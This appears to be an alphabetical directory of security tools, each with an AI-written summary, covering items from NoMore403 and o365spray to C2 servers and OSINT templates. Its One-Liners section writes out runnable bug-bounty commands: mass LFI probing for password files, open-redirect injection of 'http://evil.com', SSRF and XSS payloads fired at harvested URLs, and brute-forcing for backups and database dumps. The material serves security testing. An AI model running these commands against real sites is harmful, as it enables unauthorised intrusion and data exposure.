AI Summary: NoMore403 is a specialized tool for cybersecurity professionals aimed at bypassing HTTP 40X errors during web security assessments. It employs multiple techniques such as header manipulation, method tampering, and custom path testing to automate the bypass process, featuring smart output filtering to highlight significant results and high concurrency for efficient testing. Notable capabilities include auto-calibration, deduplication of results, color-coded output, and customizable payloads for enhanced flexibility.

README

NoMore403

AI Summary: NoPE Proxy is a Burp Suite extension that facilitates the interception and analysis of TCP and UDP traffic, including non-HTTP protocols. Its notable features include a configurable DNS server that routes traffic to Burp, support for multiple listening ports for man-in-the-middle (MiTM) connections, and the ability to define match and replace rules for traffic manipulation. This tool is especially useful for security testing of mobile applications and thick clients, allowing seamless traffic analysis and modification.

AI Summary: Nosey Parker is a command-line interface (CLI) tool designed for scanning textual data to identify secrets and sensitive information, essentially functioning as a specialized grep for secret detection. Targeted primarily at offensive security operations, it offers features such as flexible scanning of various data sources, usage of 188 precision-focused regex rules, deduplication of matches to streamline review processes, and high-speed scanning capabilities, making it suitable for large-scale security engagements. Note that Nosey Parker has been officially retired and replaced by the tool Titus.

AI Summary: NoSQLMap is a Python tool designed for auditing and automating injection attacks on NoSQL databases, primarily targeting MongoDB and CouchDB, while also preparing for support of others like Redis and Cassandra. It helps identify and exploit default configuration vulnerabilities to disclose or replicate database data through a user-friendly menu-based interface. Key features include options for NoSQL DB access attacks, web application attacks, and scanning for anonymous MongoDB access.

AI Summary: npq is a tool designed to audit npm packages prior to installation, enhancing security during the package management process. It performs multiple checks, including vulnerability assessments using the Snyk database, package age, popularity metrics, and the presence of essential documentation files. Notable features include an auto-continue mode after warnings and customizable settings for strict security reviews.

README

npq allows you to audit npm packages before you install them

AI Summary: The Nuclei + Wordfence CVE project provides a comprehensive set of 71,889 Nuclei templates specifically designed for assessing security vulnerabilities in WordPress, including core, plugins, and themes. Notably, the templates are regularly updated to reflect the latest threats identified by Wordfence, offering users a robust tool for proactive site protection and vulnerability identification. This open-source solution allows for customization, giving users the flexibility to adapt templates to meet specific security needs.

AI Summary: o365recon is a PowerShell script designed for retrieving information from Office 365 and Azure AD using valid credentials. Its primary use case is to facilitate information gathering for security assessments, with a notable feature allowing optional Azure querying through a simple command-line interface. The tool requires the installation of MSOnline and AzureAD modules and includes support for multi-factor authentication.

README

o365recon

script to retrieve information via O365 and AzureAD with a valid cred

AI Summary: o365spray is a specialized tool for username enumeration and password spraying targeting Microsoft Office 365 (O365) environments. It allows users to validate domains, enumerate usernames, and conduct password spraying attacks, featuring configurable options for lockout policies and enumeration modules. The tool emphasizes caution by automatically managing lockout timers during operations to mitigate potential account lockouts.

README

o365spray

o365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365). This tool reimplements a collection of enumeration and spray techniques researched and identified by those mentioned in Acknowledgments.

AI Summary: Obfuscator is a native C++23 code obfuscation tool designed to enhance software security by transforming executable code through various methods such as bogus control flow and constant encryption. Its primary use case is to protect applications from decompilation and reverse engineering, making it compatible with popular disassemblers like IDA and Ghidra. Notable features include customizable function and transform configurations, support for both Linux and Windows platforms, and the ability to specify additional debugging information through PDB and MAP files.

AI Summary: The Obfuscator.io Deobfuscator is a tool designed to reverse the obfuscation applied by Obfuscator.io, enabling the recovery of original scripts. Its primary use case is to facilitate code analysis and debugging by recovering strings, removing unnecessary code, and simplifying complex structures without executing untrusted code. Notable features include automatic configuration detection, improved readability through control flow restoration, and compatibility with various forks of the original obfuscator.

README

Obfuscator.io Deobfuscator

A deobfuscator for scripts obfuscated by Obfuscator.io

AI Summary: Obliteration is an open-source PlayStation 4 kernel reimplementation in Rust, designed to enable the execution of dumped PlayStation 4 system software on various operating systems, including Windows, Linux, and macOS. Notable features include cross-platform support with native binaries, near-native performance leveraging hypervisor technologies, and a kernel architecture aimed to closely resemble the original PlayStation 4 kernel for enhanced compatibility. Currently, the project is in early development and does not yet support game execution.

AI Summary: The Obsidian OSINT Templates provide structures and frameworks for organizing data during Open Source Intelligence (OSINT) investigations using the Obsidian notetaking tool. Notable features include customizable templates designed to enhance data recording and connection-making, which facilitate efficient analysis and documentation of investigative findings. This resource aims to support both new and experienced users in effectively leveraging Obsidian for their OSINT needs.

README

obsidian-osint-templates

[!info] License Copyright (c) 2024 Micah Hoffman

AI Summary: Octopus is an open-source, pre-operation command-and-control (C2) server developed in Python, designed for red team operations to facilitate initial attacks and information gathering before launching full engagements. It features secure communications through AES-256 encryption, remote command execution, file transfers, and a unique Endpoint Situational Awareness (ESA) capability that allows users to assess target environments effectively. The tool supports multiple Windows versions and enables stealthy operations, making it less detectable by conventional security measures.

AI Summary: ODAT (Oracle Database Attacking Tool) is an open-source penetration testing tool designed to assess the security of Oracle databases remotely. Key features include the capability to identify valid SIDs and credentials, escalate privileges to DBA or SYSDBA, and execute system commands like reverse shells. It supports various Oracle Database versions and offers extensive options for connectivity checks and detailed database information extraction.

README

ODAT

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

AI Summary: Offensive Docker is a Docker image designed to facilitate the rapid setup of a penetration testing environment by bundling a comprehensive suite of commonly used security tools. Its primary use case is to streamline the pentesting process, featuring tools for port scanning, reconnaissance, web application testing, and brute-forcing, among others. Notably, it allows users to quickly deploy a fully equipped pentesting environment in various cloud platforms, enhancing efficiency in security assessments.

AI Summary: Offensive-OSINT-Tools is a curated collection of essential tools tailored for Offensive Security specialists engaged in penetration testing and red teaming. It streamlines the OSINT process by categorizing tools for various purposes, including domain investigation, email address collection, and information gathering. Notable features include the ability to efficiently search for subdomains and URLs, along with a focus on usability by providing only the most relevant tools, rather than an overwhelming list.

AI Summary: Offensive-Resources V4 is a comprehensive repository designed for offensive security practitioners, providing an extensive collection of learning materials and labs across various cybersecurity domains. Its primary use case is to facilitate skill development in offensive security techniques, with notable features including a wide range of topics from exploit development to IoT and hardware hacking, structured resources for diverse platforms, and an open invitation for community contributions.

README

Offensive-Resources V4

((اللَّهُمَّ انْفَعْنِي بِمَا عَلَّمْتَنِي، وَعَلِّمْنِي مَا يَنْفَعُنِي، وَزِدْنِي عِلْمًا))

AI Summary: OffSec Reporting is a customizable platform designed for security professionals to efficiently create penetration test reports tailored for Offensive Security certifications. Built on SysReptor, it enables users to write reports in Markdown, render them as PDFs, and supports various OffSec certifications including OSCP, OSEP, and OSWP. Notable features include free accessibility, rapid report generation, and a focus on facilitating the testing process without the burden of formatting.

README

OffSec Reporting using SysReptor

AI Summary: OFRAK (Open Firmware Reverse Analysis Konsole) is a comprehensive binary analysis and modification platform designed specifically for embedded firmware and various binary formats. Its notable features include an interactive GUI for detailed exploration, a Python API for scripting reusable analyses, recursive unpacking and repacking capabilities, and integration with advanced reverse engineering tools such as angr and Ghidra, allowing users to effectively identify, analyze, and modify complex firmware.

README

OFRAK

OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

AI Summary: OH SHINT is an informational blog focused on open-source intelligence (OSINT) and related topics, including operational security, surveillance, and counter-surveillance techniques. The blog aims to document various resources, tools, and methods for conducting OSINT investigations while sharing insights from the author’s expertise as a licensed private investigator. Notable features include comprehensive write-ups, guides, and resources that cover a wide array of intelligence-related subjects, catering to both amateurs and professionals in the field.

AI Summary: oletools is a Python package designed for analyzing Microsoft OLE2 files, including older Microsoft Office documents, MSI files, and Outlook messages, primarily for malware detection, forensics, and debugging. Key features include the ability to detect, extract, and analyze VBA macros, OLE objects, Excel 4 macros (XLM), DDE links, and capabilities for analyzing RTF and OpenXML files. The tool is built on the olefile parser, enhancing its functionality with various detection mechanisms and logging options.

AI Summary: The On-Chain Investigations Tools List is a comprehensive repository designed for conducting thorough investigations into blockchain-related activities. Its primary use case is to provide a curated compilation of tools and resources for tracking crypto hacks, security incidents, and on-chain analysis, featuring various utilities for data analysis, such as Nansen, Dune, and Metasleuth. Notable features include diverse categories of tools, a knowledge hub, and educational articles that guide users in developing effective investigative methodologies.

AI Summary: OneGadget is a Ruby gem designed for locating one-gadget RCE exploits within libc binaries, simplifying the process for participants in Capture The Flag (CTF) challenges. It leverages symbolic execution to efficiently identify gadgets that result in the execution of /bin/sh, supports multiple architectures (i386, amd64, aarch64), and offers a command-line interface for user-friendly interaction with customizable output options.

README

OneGadget

When playing ctf pwn challenges we usually need the one-gadget RCE (remote code execution), which leads to call execve('/bin/sh', NULL, NULL).

AI Summary: One-Liners is a comprehensive toolkit designed for bug bounty hunters, facilitating rapid reconnaissance and vulnerability scanning through efficient one-liner commands. It primarily focuses on subdomain enumeration, open redirect testing, LFI, SSRF, and XSS detection using various profiling tools like subfinder, dnsx, and nuclei. Notable features include integration with multiple API sources for subdomain discovery and streamlined workflows for testing web application vulnerabilities.

README

One-Liners for bug bounty

Thanks to all who create these Awesome One Liners❤️

One Line recon using pd tools

subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt

Subdomain Enumeration

## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1  | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'

## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u 

## from Riddler.io

curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

## from RedHunt Labs Recon API
curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=<target.com>&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from Archive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

## from JLDC
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

## from ThreatMiner
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u

## from Anubis
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"

## from ThreatCrowd
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"

## from HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"

## from AlienVault
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u

## from Censys
censys subdomains target.com

## from subdomain center
curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u

LFI:

cat targets.txt | (gau || hakrawler || waybackurls || katana) |  grep "=" |  dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

Open Redirect:

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done

cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'

SSRF:

cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr 

XSS:

Knoxss mass hunting

file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file

cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep =  | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"

cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe

echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht

cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'

Hidden Dirs:

dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt

ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json

ffuf json to txt output

cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txt

Search for Sensitive files from Wayback

AI Summary: OneCLI is an open-source credential management gateway designed for AI agents, providing a secure method to store and inject API keys without exposing them to the agents themselves. It offers features such as AES-256-GCM encrypted secret storage, transparent credential injection, host and path matching for secret routing, and support for multiple agents with scoped permissions. The system enables easy setup via Docker and integrates with external vaults like Bitwarden for on-demand credential access, enhancing security and manageability in API interactions.